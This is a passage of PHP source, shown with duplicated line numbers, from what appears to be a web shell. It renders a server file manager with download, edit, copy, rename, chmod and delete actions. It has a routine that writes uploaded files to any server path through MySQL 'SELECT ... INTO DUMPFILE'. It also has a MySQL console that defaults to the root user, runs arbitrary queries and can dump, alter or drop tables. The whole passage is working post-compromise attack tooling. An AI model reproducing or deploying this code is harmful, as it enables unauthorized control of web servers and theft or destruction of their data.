652 $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown'; 652 $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
653 } else { 653 } else {
654 $attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>'; 654 $attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
655 } 655 }
656 $thisbg = bg(); 656 $thisbg = bg();
657 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">'); 657 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
658 p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['server_link'].'"></td>'); 658 p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['server_link'].'"></td>');
659 p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>'); 659 p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
660 p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$dirdb['server_link'].'\',\''.$dirdb['dirlink'].'\');">'.$dirdb['mtime'].'</a></td>'); 660 p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$dirdb['server_link'].'\',\''.$dirdb['dirlink'].'\');">'.$dirdb['mtime'].'</a></td>');
661 p('<td nowrap>'.$attachsize.'</td>'); 661 p('<td nowrap>'.$attachsize.'</td>');
662 p('<td nowrap>'); 662 p('<td nowrap>');
663 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / '); 663 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
664 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>'); 664 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
665 p('<td nowrap><a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>'); 665 p('<td nowrap><a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
666 p('</tr>'); 666 p('</tr>');
667 $dir_i++; 667 $dir_i++;
668 } else { 668 } else {
669 if($dirdb['filename']=='..') { 669 if($dirdb['filename']=='..') {
670 p('<tr class='.bg().'>'); 670 p('<tr class='.bg().'>');
671 p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>'); 671 p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
672 p('</tr>'); 672 p('</tr>');
673 } 673 }
674 } 674 }
675 } 675 }
676 676
677 p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>'); 677 p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
678 $file_i = '0'; 678 $file_i = '0';
679 679
680 foreach($filedata as $key => $filedb){ 680 foreach($filedata as $key => $filedb){
681 if($filedb['filename']!='..' && $filedb['filename']!='.') { 681 if($filedb['filename']!='..' && $filedb['filename']!='.') {
682 $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']); 682 $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
683 $thisbg = bg(); 683 $thisbg = bg();
684 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">'); 684 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
685 p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['server_link'].'"></td>'); 685 p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['server_link'].'"></td>');
686 p('<td>'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>'); 686 p('<td>'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
687 p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">'.$filedb['mtime'].'</a></td>'); 687 p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">'.$filedb['mtime'].'</a></td>');
688 p('<td nowrap>'.$filedb['size'].'</td>'); 688 p('<td nowrap>'.$filedb['size'].'</td>');
689 p('<td nowrap>'); 689 p('<td nowrap>');
690 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / '); 690 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
691 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>'); 691 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
692 p('<td nowrap>'); 692 p('<td nowrap>');
693 p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | '); 693 p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
694 p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | '); 694 p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
695 p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | '); 695 p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
696 p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a>'); 696 p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a>');
697 p('</td></tr>'); 697 p('</td></tr>');
698 $file_i++; 698 $file_i++;
699 } 699 }
700 } 700 }
701 p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>'); 701 p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
702 p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td colspan="4"><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>'); 702 p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td colspan="4"><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
703 p('</form></table>'); 703 p('</form></table>');
704}// end dir 704}// end dir
705 705
706elseif ($action == 'sqlfile') { 706elseif ($action == 'sqlfile') {
707 if($doing=="mysqlupload"){ 707 if($doing=="mysqlupload"){
708 $file = $_FILES['uploadfile']; 708 $file = $_FILES['uploadfile'];
709 $filename = $file['tmp_name']; 709 $filename = $file['tmp_name'];
710 if (file_exists($savepath)) { 710 if (file_exists($savepath)) {
711 m('The goal file has already existed'); 711 m('The goal file has already existed');
712 } else { 712 } else {
713 if(!$filename) { 713 if(!$filename) {
714 m('Please choose a file'); 714 m('Please choose a file');
715 } else { 715 } else {
716 $fp=@fopen($filename,'r'); 716 $fp=@fopen($filename,'r');
717 $contents=@fread($fp, filesize($filename)); 717 $contents=@fread($fp, filesize($filename));
718 @fclose($fp); 718 @fclose($fp);
719 $contents = bin2hex($contents); 719 $contents = bin2hex($contents);
720 if(!$upname) $upname = $file['name']; 720 if(!$upname) $upname = $file['name'];
721 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); 721 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
722 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';"); 722 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
723 m($result ? 'Upload success' : 'Upload has failed: '.mysql_error()); 723 m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
724 } 724 }
725 } 725 }
726 } 726 }
727?> 727?>
728<script type="text/javascript"> 728<script type="text/javascript">
729function mysqlfile(doing){ 729function mysqlfile(doing){
730 if(!doing) return; 730 if(!doing) return;
731 $('doing').value=doing; 731 $('doing').value=doing;
732 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value; 732 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
733 $('mysqlfile').dbport.value=$('dbinfo').dbport.value; 733 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
734 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value; 734 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
735 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value; 735 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
736 $('mysqlfile').dbname.value=$('dbinfo').dbname.value; 736 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
737 $('mysqlfile').charset.value=$('dbinfo').charset.value; 737 $('mysqlfile').charset.value=$('dbinfo').charset.value;
738 $('mysqlfile').submit(); 738 $('mysqlfile').submit();
739} 739}
740</script> 740</script>
741<?php 741<?php
742 !$dbhost && $dbhost = 'localhost'; 742 !$dbhost && $dbhost = 'localhost';
743 !$dbuser && $dbuser = 'root'; 743 !$dbuser && $dbuser = 'root';
744 !$dbport && $dbport = '3306'; 744 !$dbport && $dbport = '3306';
745 formhead(array('title'=>'MYSQL Information','name'=>'dbinfo')); 745 formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
746 makehide('action','sqlfile'); 746 makehide('action','sqlfile');
747 p('<p>'); 747 p('<p>');
748 p('DBHost:'); 748 p('DBHost:');
749 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); 749 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
750 p(':'); 750 p(':');
751 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); 751 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
752 p('DBUser:'); 752 p('DBUser:');
753 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); 753 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
754 p('DBPass:'); 754 p('DBPass:');
755 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); 755 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
756 p('DBName:'); 756 p('DBName:');
757 makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); 757 makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
758 p('DBCharset:'); 758 p('DBCharset:');
759 makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1)); 759 makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
760 p('</p>'); 760 p('</p>');
761 formfoot(); 761 formfoot();
762 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">'); 762 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
763 p('<h2>Upload file</h2>'); 763 p('<h2>Upload file</h2>');
764 p('<p><b>This operation the DB user must has FILE privilege</b></p>'); 764 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
765 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>'); 765 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
766 p('<h2>Download file</h2>'); 766 p('<h2>Download file</h2>');
767 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>'); 767 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
768 makehide('dbhost'); 768 makehide('dbhost');
769 makehide('dbport'); 769 makehide('dbport');
770 makehide('dbuser'); 770 makehide('dbuser');
771 makehide('dbpass'); 771 makehide('dbpass');
772 makehide('dbname'); 772 makehide('dbname');
773 makehide('charset'); 773 makehide('charset');
774 makehide('doing'); 774 makehide('doing');
775 makehide('action','sqlfile'); 775 makehide('action','sqlfile');
776 p('</form>'); 776 p('</form>');
777} 777}
778 778
779elseif ($action == 'mysqladmin') { 779elseif ($action == 'mysqladmin') {
780 !$dbhost && $dbhost = 'localhost'; 780 !$dbhost && $dbhost = 'localhost';
781 !$dbuser && $dbuser = 'root'; 781 !$dbuser && $dbuser = 'root';
782 !$dbport && $dbport = '3306'; 782 !$dbport && $dbport = '3306';
783 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />'; 783 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
784 if(isset($dbhost)){ 784 if(isset($dbhost)){
785 $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n"; 785 $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
786 } 786 }
787 if(isset($dbuser)) { 787 if(isset($dbuser)) {
788 $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n"; 788 $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
789 } 789 }
790 if(isset($dbpass)) { 790 if(isset($dbpass)) {
791 $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n"; 791 $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
792 } 792 }
793 if(isset($dbport)) { 793 if(isset($dbport)) {
794 $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n"; 794 $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
795 } 795 }
796 if(isset($dbname)) { 796 if(isset($dbname)) {
797 $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n"; 797 $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
798 } 798 }
799 if(isset($charset)) { 799 if(isset($charset)) {
800 $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n"; 800 $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
801 } 801 }
802 802
803 if ($doing == 'backupmysql' && $saveasfile) { 803 if ($doing == 'backupmysql' && $saveasfile) {
804 if (!$table) { 804 if (!$table) {
805 m('Please choose the table'); 805 m('Please choose the table');
806 } else { 806 } else {
807 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); 807 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
808 $fp = @fopen($path,'w'); 808 $fp = @fopen($path,'w');
809 if ($fp) { 809 if ($fp) {
810 foreach($table as $k => $v) { 810 foreach($table as $k => $v) {
811 if ($v) { 811 if ($v) {
812 sqldumptable($v, $fp); 812 sqldumptable($v, $fp);
813 } 813 }
814 } 814 }
815 fclose($fp); 815 fclose($fp);
816 $fileurl = str_replace(SA_ROOT,'',$path); 816 $fileurl = str_replace(SA_ROOT,'',$path);
817 m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>'); 817 m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
818 mysql_close(); 818 mysql_close();
819 } else { 819 } else {
820 m('Backup failed'); 820 m('Backup failed');
821 } 821 }
822 } 822 }
823 } 823 }
824 if ($insert && $insertsql) { 824 if ($insert && $insertsql) {
825 $keystr = $valstr = $tmp = ''; 825 $keystr = $valstr = $tmp = '';
826 foreach($insertsql as $key => $val) { 826 foreach($insertsql as $key => $val) {
827 if ($val) { 827 if ($val) {
828 $keystr .= $tmp.$key; 828 $keystr .= $tmp.$key;
829 $valstr .= $tmp."'".addslashes($val)."'"; 829 $valstr .= $tmp."'".addslashes($val)."'";
830 $tmp = ','; 830 $tmp = ',';
831 } 831 }
832 } 832 }
833 if ($keystr && $valstr) { 833 if ($keystr && $valstr) {
834 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); 834 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
835 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); 835 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
836 } 836 }
837 } 837 }
838 if ($update && $insertsql && $base64) { 838 if ($update && $insertsql && $base64) {
839 $valstr = $tmp = ''; 839 $valstr = $tmp = '';
840 foreach($insertsql as $key => $val) { 840 foreach($insertsql as $key => $val) {
841 $valstr .= $tmp.$key."='".addslashes($val)."'"; 841 $valstr .= $tmp.$key."='".addslashes($val)."'";
842 $tmp = ','; 842 $tmp = ',';
843 } 843 }
844 if ($valstr) { 844 if ($valstr) {
845 $where = base64_decode($base64); 845 $where = base64_decode($base64);
846 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); 846 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
847 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); 847 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
848 } 848 }
849 } 849 }
850 if ($doing == 'del' && $base64) { 850 if ($doing == 'del' && $base64) {
851 $where = base64_decode($base64); 851 $where = base64_decode($base64);
852 $delete_sql = "DELETE FROM $tablename WHERE $where"; 852 $delete_sql = "DELETE FROM $tablename WHERE $where";
853 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); 853 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
854 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); 854 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
855 } 855 }
856 856
857 if ($tablename && $doing == 'drop') { 857 if ($tablename && $doing == 'drop') {
858 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); 858 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
859 if (q("DROP TABLE $tablename")) { 859 if (q("DROP TABLE $tablename")) {
860 m('Drop table of success'); 860 m('Drop table of success');
861 $tablename = ''; 861 $tablename = '';
862 } else { 862 } else {
863 m(mysql_error()); 863 m(mysql_error());
864 } 864 }
865 } 865 }
866 866
867 formhead(array('title'=>'MYSQL Manager')); 867 formhead(array('title'=>'MYSQL Manager'));
868 makehide('action','mysqladmin'); 868 makehide('action','mysqladmin');
869 p('<p>'); 869 p('<p>');
870 p('DBHost:'); 870 p('DBHost:');
871 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); 871 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
872 p(':'); 872 p(':');
873 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); 873 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
874 p('DBUser:'); 874 p('DBUser:');
875 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); 875 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
876 p('DBPass:'); 876 p('DBPass:');
877 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); 877 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
878 p('DBCharset:'); 878 p('DBCharset:');
879 makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1)); 879 makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
880 makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); 880 makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
881 p('</p>'); 881 p('</p>');
882 formfoot(); 882 formfoot();
883 883
884 //操作记录 884 //操作记录
885 formhead(array('name'=>'recordlist')); 885 formhead(array('name'=>'recordlist'));
886 makehide('doing'); 886 makehide('doing');
887 makehide('action','mysqladmin'); 887 makehide('action','mysqladmin');
888 makehide('base64'); 888 makehide('base64');
889 makehide('tablename'); 889 makehide('tablename');
890 p($dbform); 890 p($dbform);
891 formfoot(); 891 formfoot();
892 892
893 //选定数据库 893 //选定数据库
894 formhead(array('name'=>'setdbname')); 894 formhead(array('name'=>'setdbname'));
895 makehide('action','mysqladmin'); 895 makehide('action','mysqladmin');
896 p($dbform); 896 p($dbform);
897 if (!$dbname) { 897 if (!$dbname) {
898 makehide('dbname'); 898 makehide('dbname');
899 } 899 }
900 formfoot(); 900 formfoot();
901 901
902 //选定表 902 //选定表
903 formhead(array('name'=>'settable')); 903 formhead(array('name'=>'settable'));
904 makehide('action','mysqladmin'); 904 makehide('action','mysqladmin');
905 p($dbform); 905 p($dbform);
906 makehide('tablename'); 906 makehide('tablename');
907 makehide('page',$page); 907 makehide('page',$page);
908 makehide('doing'); 908 makehide('doing');
909 formfoot(); 909 formfoot();
910 910
911 $cachetables = array(); 911 $cachetables = array();
912 $pagenum = 30; 912 $pagenum = 30;
913 $page = intval($page); 913 $page = intval($page);
914 if($page) { 914 if($page) {
915 $start_limit = ($page - 1) * $pagenum; 915 $start_limit = ($page - 1) * $pagenum;
916 } else { 916 } else {
917 $start_limit = 0; 917 $start_limit = 0;
918 $page = 1; 918 $page = 1;
919 } 919 }
920 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { 920 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
921 $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); 921 $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
922 //获取数据库信息 922 //获取数据库信息
923 $mysqlver = mysql_get_server_info(); 923 $mysqlver = mysql_get_server_info();
924 p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>'); 924 p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
925 $highver = $mysqlver > '4.1' ? 1 : 0; 925 $highver = $mysqlver > '4.1' ? 1 : 0;
926 926
927 //获取数据库 927 //获取数据库
928 $query = q("SHOW DATABASES"); 928 $query = q("SHOW DATABASES");
929 $dbs = array(); 929 $dbs = array();
930 $dbs[] = '-- Select a database --'; 930 $dbs[] = '-- Select a database --';
931 while($db = mysql_fetch_array($query)) { 931 while($db = mysql_fetch_array($query)) {
932 $dbs[$db['Database']] = $db['Database']; 932 $dbs[$db['Database']] = $db['Database'];
933 } 933 }
934 makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); 934 makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
935 $tabledb = array(); 935 $tabledb = array();
936 if ($dbname) { 936 if ($dbname) {
937 p('<p>'); 937 p('<p>');
938 p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>'); 938 p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
939 if ($tablename) { 939 if ($tablename) {
940 p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]'); 940 p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
941 } 941 }
942 p('</p>'); 942 p('</p>');
943 mysql_select_db($dbname); 943 mysql_select_db($dbname);
944 944
945 $getnumsql = ''; 945 $getnumsql = '';
946 $runquery = 0; 946 $runquery = 0;
947 if ($sql_query) { 947 if ($sql_query) {
948 $runquery = 1; 948 $runquery = 1;
949 } 949 }
950 $allowedit = 0; 950 $allowedit = 0;
951 if ($tablename && !$sql_query) { 951 if ($tablename && !$sql_query) {
952 $sql_query = "SELECT * FROM $tablename"; 952 $sql_query = "SELECT * FROM $tablename";
953 $getnumsql = $sql_query; 953 $getnumsql = $sql_query;
954 $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; 954 $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
955 $allowedit = 1; 955 $allowedit = 1;
956 } 956 }
957 p('<form action="'.$self.'" method="POST">'); 957 p('<form action="'.$self.'" method="POST">');
958 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>'); 958 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
959 makehide('tablename', $tablename); 959 makehide('tablename', $tablename);
960 makehide('action','mysqladmin'); 960 makehide('action','mysqladmin');
961 p($dbform); 961 p($dbform);
962 p('</form>'); 962 p('</form>');
963 if ($tablename || ($runquery && $sql_query)) { 963 if ($tablename || ($runquery && $sql_query)) {
964 if ($doing == 'structure') { 964 if ($doing == 'structure') {
965 $result = q("SHOW FULL COLUMNS FROM $tablename"); 965 $result = q("SHOW FULL COLUMNS FROM $tablename");
966 $rowdb = array(); 966 $rowdb = array();
967 while($row = mysql_fetch_array($result)) { 967 while($row = mysql_fetch_array($result)) {
968 $rowdb[] = $row; 968 $rowdb[] = $row;
969 } 969 }
970 p('<h3>Structure</h3>'); 970 p('<h3>Structure</h3>');
971 p('<table border="0" cellpadding="3" cellspacing="0">'); 971 p('<table border="0" cellpadding="3" cellspacing="0">');
972 p('<tr class="head">'); 972 p('<tr class="head">');
973 p('<td>Field</td>'); 973 p('<td>Field</td>');
974 p('<td>Type</td>'); 974 p('<td>Type</td>');
975 p('<td>Collation</td>'); 975 p('<td>Collation</td>');
976 p('<td>Null</td>'); 976 p('<td>Null</td>');
977 p('<td>Key</td>'); 977 p('<td>Key</td>');
978 p('<td>Default</td>'); 978 p('<td>Default</td>');
979 p('<td>Extra</td>'); 979 p('<td>Extra</td>');
980 p('<td>Privileges</td>'); 980 p('<td>Privileges</td>');
981 p('<td>Comment</td>'); 981 p('<td>Comment</td>');
982 p('</tr>'); 982 p('</tr>');
983 foreach ($rowdb as $row) { 983 foreach ($rowdb as $row) {
984 $thisbg = bg(); 984 $thisbg = bg();
985 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">'); 985 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
986 p('<td>'.$row['Field'].'</td>'); 986 p('<td>'.$row['Field'].'</td>');
987 p('<td>'.$row['Type'].'</td>'); 987 p('<td>'.$row['Type'].'</td>');
988 p('<td>'.$row['Collation'].'&nbsp;</td>'); 988 p('<td>'.$row['Collation'].'&nbsp;</td>');
989 p('<td>'.$row['Null'].'&nbsp;</td>'); 989 p('<td>'.$row['Null'].'&nbsp;</td>');
990 p('<td>'.$row['Key'].'&nbsp;</td>'); 990 p('<td>'.$row['Key'].'&nbsp;</td>');
991 p('<td>'.$row['Default'].'&nbsp;</td>'); 991 p('<td>'.$row['Default'].'&nbsp;</td>');
992 p('<td>'.$row['Extra'].'&nbsp;</td>'); 992 p('<td>'.$row['Extra'].'&nbsp;</td>');
